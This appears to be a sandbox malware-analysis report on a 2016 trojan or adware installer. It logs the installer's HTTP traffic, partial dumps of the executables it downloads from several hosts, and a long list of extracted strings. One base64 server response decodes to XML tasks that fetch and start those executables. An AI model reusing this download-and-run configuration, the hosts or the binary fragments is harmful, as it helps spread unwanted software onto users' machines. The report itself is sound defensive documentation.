HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:59 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=aa049f5sbrff9cvj7ba5ehfmp7; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_combroadcaster_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:59 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=mavpk44n4t017cie827d526bh6; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:56:59 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=mav
pk44n4t017cie827d526bh6; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_combroadcaster_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:04 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=rim5970ilgj3fjuh80flk2ac93; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /tuto/wizzmonetize/buying_installer_mpck_ref015_2_done HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 48

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=tuto&api_key=aeaze-zeaeaz-eazeaze-aeaz

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:05 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=110st6krvpd3e93g5nps830uu4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 05 Dec 2016 1
7:57:05 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=110
st6krvpd3e93g5nps830uu4; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}..

GET /download/2/wizzrelease.exe HTTP/1.1

Host: downloadmyhost.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:59 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzrelease.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2a6400..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....EX.........."...0.. &..B......V?&.. ...@&...@.. ................
........*...........@..................................?&.O....@&..>
;....................*......=&........................................
...... ............... ..H............text...\.&.. ... &..............
... ..`.rsrc....>...@&..@..."&.............@..@.reloc........*.....
.b*.............@..B................8?&.....H.......l#..8............5
..(.&..........................................0..>.......s...... .
...}.....r...p}...........s....s....(......&...(....*...........4.....
...(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*.~
....*..(....*Vs....(....t.........*.0..M.......(.....o......s ...%o!..
...o"...o#......(...%..!.o$................(....(%...*....0..5.......s
.......{}.....r...p}...........s....s....(......&..*............1.....
..(.....-.r?..ps&...z.('...o(...%-.rO..ps&...z.......%...o)...&*..0...
........(%.....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...
o1.....s2.......s3.....i.6.....%......io4......o"...o"...(5........o6.
..r_..p(7...o8...*..0..........rc..p(.......(......&..*...............
..0..:........ .  ..X...{......7...(9....{.....7...(9...}......{....2.
*...0..9.........  ..X...{......7...(9....{.....7...(9...}......{....2
.*...BSJB............v2.0.50727......l.......#~..d.......#Strings.....
.......#US.........#GUID.......p...#Blob...........WU.........3...
<<< skipped >>>

POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: wizzcaster.com

Content-Length: 17

Expect: 100-continue

HTTP/1.1 100 Continue
....



uid=5836ca80e6d5d

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:13 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=c9708501f243adea810dba3778dc4c58d44d5589; expires=Mon, 05-Dec-2016 19:57:13 GMT; Max-Age=7200; path=/; httponly

Content-Length: 60

Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/goodwebshow.com\/redirect\/5836ca80e6d5d"}HTTP/1.1 2
00 OK..Date: Mon, 05 Dec 2016 17:57:13 GMT..Server: Apache/2.4.10 (Deb
ian)..Cache-Control: no-cache..Set-Cookie: laravel_session=c9708501f24
3adea810dba3778dc4c58d44d5589; expires=Mon, 05-Dec-2016 19:57:13 GMT; 
Max-Age=7200; path=/; httponly..Content-Length: 60..Content-Type: text
/html; charset=UTF-8..{"link":"http:\/\/goodwebshow.com\/redirect\/583
6ca80e6d5d"}..

GET /download/2/wizzproduct.exe HTTP/1.1

Host: downloadmyhost.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:50 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzproduct.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
99000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.....EX.........."...0..L...B.......j... ........@.. .................
...................@..................................i..O........>
..........................|h..........................................
..... ............... ..H............text....J... ...L................
.. ..`.rsrc....>.......@...N..............@..@.reloc...............
...............@..B.................i......H.......l#..8............5.
..2...........................................0..>.......s...... ..
..}.....r...p}...........s....s....(......&...(....*...........4......
..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*.~.
...*..(....*Vs....(....t.........*.0..M.......(.....o......s ...%o!...
..o"...o#......(...%..!.o$................(....(%...*....0..5.......s.
......{}.....r...p}...........s....s....(......&..*............1......
.(.....-.r?..ps&...z.('...o(...%-.rO..ps&...z.......%...o)...&*..0....
.......(%.....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o
1.....s2.......s3.....i.6.....%......io4......o"...o"...(5........o6..
.r_..p(7...o8...*..0..........rc..p(.......(......&..*................
.0..:........ .  ..X...{......7...(9....{.....7...(9...}......{....2.*
...0..9.........  ..X...{......7...(9....{.....7...(9...}......{....2.
*...BSJB............v2.0.50727......l.......#~..d.......#Strings......
......#US.........#GUID.......p...#Blob...........WU.........3....
<<< skipped >>>

GET /download/2/mobilepcstarterkit_widget.exe HTTP/1.1

Host: downloadmyhost.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:52 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="mobilepcstarterkit_widget.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
172444..MZP.....................@.....................................
..........!..L.!..This program must be run under Win32..$7............
......................................................................
......................................................PE..L....^B*....
.................F....................@..........................@....
...............@..............................P........,..............
......................................................................
......................CODE....0........................... ..`DATA....
P...........................@...BSS...................................
...idata..P...........................@....tls........................
.............rdata..............................@..P.reloc............
..................@..P.rsrc....,.......,..................@..P........
.....@......................@..P......................................
......................................................................
......................................................string..........
......<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitI
nstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..Cl
assNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..I
nheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*
@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInsta
nce.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..
@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>

GET /download/2/mobilepcstarterkit-uninstaller.exe HTTP/1.1

Host: downloadmyhost.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:58 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="mobilepcstarterkit-uninstaller.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
110400..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....EX.........."...0......B......V.... ........@.. ................
.......@............@.....................................O........>
;................... .................................................
...... ............... ..H............text...\.... ...................
... ..`.rsrc....>.......@..................@..@.reloc....... ......
................@..B................8.......H.......l#..8............5
..(............................................0..>.......s...... .
...}.....r...p}...........s....s....(......&...(....*...........4.....
...(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*.~
....*..(....*Vs....(....t.........*.0..M.......(.....o......s ...%o!..
...o"...o#......(...%..!.o$................(....(%...*....0..5.......s
.......{}.....r...p}...........s....s....(......&..*............1.....
..(.....-.r?..ps&...z.('...o(...%-.rO..ps&...z.......%...o)...&*..0...
........(%.....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...
o1.....s2.......s3.....i.6.....%......io4......o"...o"...(5........o6.
..r_..p(7...o8...*..0..........rc..p(.......(......&..*...............
..0..:........ .  ..X...{......7...(9....{.....7...(9...}......{....2.
*...0..9.........  ..X...{......7...(9....{.....7...(9...}......{....2
.*...BSJB............v2.0.50727......l.......#~..d.......#Strings.....
.......#US.........#GUID.......p...#Blob...........WU.........3...
<<< skipped >>>

GET /download/2/combroadcaster.exe HTTP/1.1

Host: downloadmyhost.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:00 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="combroadcaster.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
40d600..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......*.AY
n|/.n|/.n|/..2..f|/....._|/.n|/.~|/.g....}/.....(}/.g...E|/.n|..../...
...}/.....X|/.....o|/.....o|/.Richn|/.........................PE..L...
NvEX..................1..........1 ...... 1...@.......................
....A.....ksA...@..................................0;......p=..`......
..............=.h...@01.............................H.8.@............ 
1.@............................text.....1.......1................. ..`
.rdata...K... 1..L....1.............@..@.data........p;..<...\;....
.........@....rsrc....`...p=..b....<.............@..@.reloc........
=.......<.............@..B.........................................
......................................................................
......................................................................
......................................................................
.............................................................V.D$.P...
.......Cq...^......Cq..M...V.....Cq..?....D$..t.V.L...Y..^....D$...|$.
.v..L$..D$.f..f;.u........L$.u.3.....f;......@..D$...P.t$..t$.........
..D$...P.t$..t$..f.......... ................... ..d....?....D$.....D$
......D$....L$. .....@..D$....A.....#..V.D$.P..........<q...^...V..
.N....D$..t.V.[...Y..^...j..]#p...b ....u.3.S...!..]..^..^..^..^..^..^
..^..^ .E..9].u(.E.P.M..E.8.w......h.wz..E.P.E..<q...1 ..u.V.i.!.YY
...xb ....j...!p...a ....u.V.E........!..F.Y..t.P... .Y.f...F...t.
<<< skipped >>>

GET /cgi-bin/advert/getkws.cgi?did=11793&version=0&key=azJJ.s8MVPsHc HTTP/1.1

User-Agent: tuto_monetize_120161205-2.00

Host: ads.adskyforever.com

Accept: */*

Accept-Encoding: gzip, deflate

Referer: 

Cookie: 

Accept-Language: en,en-US

X-Guuid: 88dcd395-b062-45b3-a6cd-79f37c0eba08

X-OS-Ver: 6.1.2.7601

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:14 GMT

Server: Apache/2.4.10 (Debian)

Last-Modified: Mon, 31 Oct 2016 15:55:19 GMT

ETag: "39-5402b3c1b934e"

Accept-Ranges: bytes

Content-Length: 57
{"dids":{},"freeze":3600,"refresh":3600,"version":125714}..

GET /download/4/replaceUninstaller.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:15 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="replaceUninstaller.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
....%X.........."...0..............6... ...@....@.. ..................
..................@.................................\6..O....@........
...............`......$5..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`.......,......
........@..B.................6......H........"..............l4........
.......................................0..~.........(....o.....~.....(
......~....(....,..*...............(....(....}.......(....-..*.j.{....
n3..{......-....(....-...1..(....*.*..(....*.......*...0............~.
...r...po......,$.r?..po....t#...rO..p(....,....o.....9....(....o ...o
!...("...rS..p(#.....($...,..(%......ru..p(....,.r{..ps&....(....& B..
.r...p(....,.r...ps&....(....&  ...rp..p(....,.rv..ps&....(....&.($...
,.~....r...po'...r?..prO..po(.....&..*.................0..........s)..
...o*.....&.....*.*..................~....-.r...p.....(....o ...s,....
....~....*.~....*.......*.~....*..(-...*Vs....(....t.........*:.(.....
.}....*..0..........s).....{....o*.....&.....*.*................BSJB..
..........v2.0.50727......l.......#~..........#Strings........8...#US.
........#GUID...(...d...#Blob...........W5.........3........).........
......................................................................
......[.....[...M.............u.....u.....u...m.u...9.u...R.u.....
<<< skipped >>>

GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1

Host: weminternal.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:16 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_installer_v2.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
3a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..f.6X.........."...0..$..........bB... ...`....@.. ..................
..................@..................................B..O....`........
.......................@..............................................
. ............... ..H............text...h"... ...$.................. .
.`.rsrc........`.......&..............@..@.reloc...............8......
........@..B................DB......H....... $.............. @........
........................................(....*:.(......}....*..0......
....s......{....o......&.....*.*.................0..........(.......!.
..%.r...p.%.rQ..p.%.rq..p.%.r...p.%.r7..p.%.rK..p.%.r2..p.%.rB..p.%.r.
..p.%..r...p.%..rA..p.%..r...p.%..r...p.%..r*..p.%..r...p.%..rz..p.%..
r...p.%..r)..p.%..rA..p.%..r...p.%..r...p.%..r...p.%..r...p.%..ro..p.%
..r...p.%..r...p.(......{....r...p(.....(....*...0..).........{.....(.
...}.....{....-.......&.....*.*...........  .......0...........{....(.
.....&..*...................2.{....o....*..{....*6.(.....(....*z.,..{.
...,..{....o......(....*z.s ...}......(!....r...po"...*^.(......i./.*.
...}....*....0..........r...p(#.....(....($...%(%...&%..(....r...p(...
.($...s....%r...ps&...o....&%o.....{....o....&ry..p($...s....%r...ps&.
..o....&o....*...0...........s....o......&..*....................0..G.
......s'....r...p... 1..r...p((...o).....r...p.(*.......( ...(.......X
...2..*.~....-.re..p.....(,...o-...s.........~....*.~....*.......*
<<< skipped >>>

GET /get/4/updater.exe HTTP/1.1

Host: weminternal.com

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:16 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="updater.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2a4000..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....EX.........."...0...%..B........&.. ... &...@.. ................
........*...........@.................................t.&.O.... &..>
;...................`*.....<.&.....................................
......... ............... ..H............text.....%.. ....%...........
...... ..`.rsrc....>... &..@....%.............@..@.reloc.......`*..
....>*.............@..B..................&.....H.......l#..8.......
.....5....%..........................................0..>.......s..
.... ....}.....r...p}...........s....s....(......&...(....*...........
4........(....*.~....-.r...p.....(....o....s.........~....*.~....*....
...*.~....*..(....*Vs....(....t.........*.0..M.......(.....o......s ..
.%o!.....o"...o#......(...%..!.o$................(....(%...*....0..5..
.....s.......{}.....r...p}...........s....s....(......&..*............
1.......(.....-.r?..ps&...z.('...o(...%-.rO..ps&...z.......%...o)...&*
..0...........(%.....(*....o ...s,.... o-....s....%.o/...%.o0....(*...
.o ...o1.....s2.......s3.....i.6.....%......io4......o"...o"...(5.....
...o6...r_..p(7...o8...*..0..........rc..p(.......(......&..*.........
........0..:........ .  ..X...{......7...(9....{.....7...(9...}......{
....2.*...0..9.........  ..X...{......7...(9....{.....7...(9...}......
{....2.*...BSJB............v2.0.50727......l.......#~..d.......#String
s............#US.........#GUID.......p...#Blob...........WU.......
<<< skipped >>>

GET /get/3/wizzcaster_v2.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:57:06 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
5a400..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W.........."...0.................. ........@.. .................
...................@.....................................O............
.......................L..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@..@.reloc.....................
.........@..B........................H........%...............@...v...
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*V.(......}......}....*...
0...........{....(....t.....s.....{......o......r...po.....r...po.....
..ijo .....o!....o".........io#......,..o......o$...t1...o%...s&...o'.
..*......R.._.......0..........(.....s....o......&..*.................
..((...~....%-.&~..........s)...%.....o*...*..0..G.......s ....r[..p..
. 1..r]..p(,...o-.....r]..p.(........(/...(0......X...2..*..(....*..0.
..........(....r[..p.....,Q....(1.......(2......5...%...%....((...o3..
.r...p(4....(5....(.....^o6...(7...&.Q((...o3...r...p(4...(8........i.
2).........(9.....(1.....(:.......(;...i. .s<...z...(....}......(..
..}....*........N..V.......0..B.......~=...r...p.o>.....-.*...(....
r...p(?...o@...r...p(A...oB....oC...*...0..?.......s ......o-.... `...
.Z(D.....{....(E...&..&.. `....{....Z(D... ...........).......~....-.r
...p.....(F...oG...sH........~....*.~....*.......*.~....*..(I...*V
<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: VVV.tutomonetize.com

Content-Length: 137

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



remote_id=3&user_name=tuto&api_key=dqsdsqf-azezae-azeaze-azeaze&buying
_product_name=mpck&buying_partner_name=ref015&buying_channel_name=2

HTTP/1.1 200 OK

Date: Mon, 05 Dec 2016 17:56:56 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=313tli42tmj417v2f0nhvin7g7; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1600

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0iYXNhc2EiIHZhbHVlPSJodHRwOi8vd2VtaW50ZXJuYWwuY29tL2Rvd25s
b2FkLzQvcmVwbGFjZVVuaW5zdGFsbGVyLmV4ZSAiIHZlcnNpb249IiIgIHNvZnR3YXJlPS
IiIG5ldD0ieWVzIi8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iYXNhc2EiIHZh
bHVlPSJub3R3YWl0IiBwYXJhbXM9InR1Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iYX
Nhc2EiIHZhbHVlPSJlZTc4OHpBQSIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25z
Pg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJhc2FzYSIgdmFsdWU9ImVlNzg4ekFBIi
BtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KDQo8L3Rhc2s PHRhc2s DQoN
CjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iY2FzdGVyIiB2YWx1ZT0iaHR0cDovL3
dlbWludGVybmFsLmNvbS9nZXQvMy93aXp6Y2FzdGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAg
c29mdHdhcmU9IiIgbmV0PSJ5ZXMiLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0IiBuYW1lPS
JjYXN0ZXIiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9IjU4MzZjYTgwZTZkNWQiLz4NCjxt
b2QgdHlwZT0iYWRkIiBuYW1lPSJjYXN0ZXIiIHZhbHVlPSIyNC8xMS8yMDE2Ii8 DQoNCj
wvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9
ImNhc3RlciIgdmFsdWU9IjI0LzExLzIwMTYiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2Nvbm
RpdGlvbnM DQoNCjwvdGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBu
YW1lPSJhZHZpc2UiIHZhbHVlPSJodHRwOi8vZG93bmxvYWRteWhvc3QuY29tL2Rvd25sb2
FkLzIvd2l6enJlbGVhc2UuZXhlIiB2ZXJzaW9uPSIiICBzb2Z0d2FyZT0iIiAvPg0KPHBy
b2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9ImFkdmlzZSIgdmFsdWU9IndhaXQiIHBhcmFtcz
0idHV0bzEiLz4NCjxtb2QgdHlwZT0iYWRkIiBuYW1lPSJtYWppIiB2YWx1ZT0ibXBvejAw
Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2
siIG5hbWU9Im1hamkiIHZhbHVlPSJtcG96MDAiIG1hdGNoPSJmYWxzZSIvPg0KDQo8
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

.DEFAULT\Control Panel\International

File I/O error %d

lzmadecompsmall: Compressed data is corrupted (%d)

lzmadecompsmall: %s

LzmaDecode failed (%d)

shell32.dll

/SUPPRESSMSGBOXES

/PASSWORD=password

Specifies the password to use.

For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline

/SL5="$%x,%d,%d,

Inno Setup Setup Data (5.5.0)

Inno Setup Messages (5.5.3)

user32.dll

oleaut32.dll

advapi32.dll

RegOpenKeyExA

RegCloseKey

GetWindowsDirectoryA

MsgWaitForMultipleObjects

ExitWindowsEx

comctl32.dll

!.<*5<<<.

<<"'"'"<'"'<

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

External exception %x

0861e59c41bb5f407dacedf51edab54f.tmp_2084:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

%s_%d

EInvalidOperation

TKeyEvent

TKeyPressEvent

crSQLWait

t.HtR

EInvalidGraphicOperation

TWindowState

poProportional

KeyPreview

WindowState

OnKeyDown

OnKeyPress

OnKeyUp

CTL3D32.DLL

PasswordChar

ssHorizontal

OnKeyUpXeB

RegDeleteKeyExA

advapi32.dll

.DEFAULT\Control Panel\International

user32.dll

shlwapi.dll

TPSExec

TPSRuntimeClassImporter

TPSExportedVar

Cannot Import

Interface not supported

TPSCustomDebugExec

TPSDebugExec

uxtheme.dll

oleacc.dll

RICHED20.DLL

RICHED32.DLL

Rstrtmgr.dll

File I/O error %d

Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.

shell32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

WININIT.INI

t.Htb

Software\Microsoft\Windows\CurrentVersion\SharedDLLs

RegCreateKeyEx

RegOpenKeyEx

sfc.dll

cmd.exe" /C "

COMMAND.COM" /C

heXE

PendingFileRenameOperations

PendingFileRenameOperations2

Software\Microsoft\Windows\CurrentVersion\Fonts

Software\Microsoft\Windows NT\CurrentVersion\Fonts

IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)

IPropertyStore::SetValue(PKEY_AppUserModel_ID)

IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)

IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)

OLEAUT32.DLL

Log opened. (Time zone: UTC%s%.2u:%.2u)

%s Log %s #%.3u.txt

MsgWaitForMultipleObjects

regsvr32.exe"

Cannot register 64-bit DLLs on this version of Windows

HELPER_EXE_AMD64

Cannot utilize 64-bit features on this version of Windows

64-bit helper EXE wasn't extracted

\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x

CreateNamedPipe

SetNamedPipeHandleState

helper %d 0x%x

Helper process PID: %u

Stopping 64-bit helper process. (PID: %u)

Helper process exited with failure code: 0x%x

TransactNamedPipe

TransactNamedPipe/GetOverlappedResult

Helper: Command did not execute

SOFTWARE\Microsoft\.NETFramework

.NET Framework not found

SOFTWARE\Microsoft\.NETFramework\Policy\v4.0

v4.0.30319

SOFTWARE\Microsoft\.NETFramework\Policy\v2.0

v2.0.50727

SOFTWARE\Microsoft\.NETFramework\Policy\v1.1

v1.1.4322

.NET Framework version %s not found

Fusion.dll

Failed to load .NET Framework DLL "%s"

Failed to get address of .NET Framework CreateAssemblyCache function

.NET Framework CreateAssemblyCache function failed

MoveFileEx failed (%d).

Deleting directory: %s

Failed to delete directory (%d). Will retry later.

Failed to delete directory (%d). Will delete on restart (if empty).

Failed to delete directory (%d).

Deleting file: %s

Failed to delete the file; it may be in use (%d).

ExtractRecData: Unicode data unsupported by this build

The file appears to be in use (%d). Will delete on restart.

Decrementing shared count (%d-bit): %s

Unregistering 64-bit DLL/OCX: %s

Unregistering 32-bit DLL/OCX: %s

Not unregistering DLL/OCX again: %s

Unregistering 64-bit type library: %s

Unregistering 32-bit type library: %s

Uninstalling from GAC: %s

Running Exec filename:

Running Exec parameters:

CreateProcess failed (%d).

Process exit code: %u

Running ShellExec filename:

Running ShellExec parameters:

ShellExecuteEx failed (%d).

Skipping RunOnceId "%s" filename: %s

Unregistering font: %s

zlib: Internal error. Code %d

1.2.1

bzlib: Internal error. Code %d

lzmadecomp: %s

lzmadecomp: Compressed data is corrupted (%d)

DecodeToBuf failed (%d)

TPasswordEdit

PasswordEdit(

Password

TStartMenuFolderTreeViewL%F

c:\directory

Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

PasswordPage

PasswordLabel

PasswordEdit

PasswordEditLabel$

Could not find page with ID %d

Software\Microsoft\Windows\CurrentVersion\Uninstall

%s\%s_is1

RestartManager found an application using one of our files: %s

Can use RestartManager to avoid reboot? %s (%d)

CheckPassword

PrepareToInstall failed: %s

Need to restart Windows? %s

/:*?"<>|

\/:*?"<>|

%s-%d.bin

%s-%d%s.bin

..\DISK%d\

Asking user for new disk containing "%s".

Cannot read an encrypted file before the key has been set

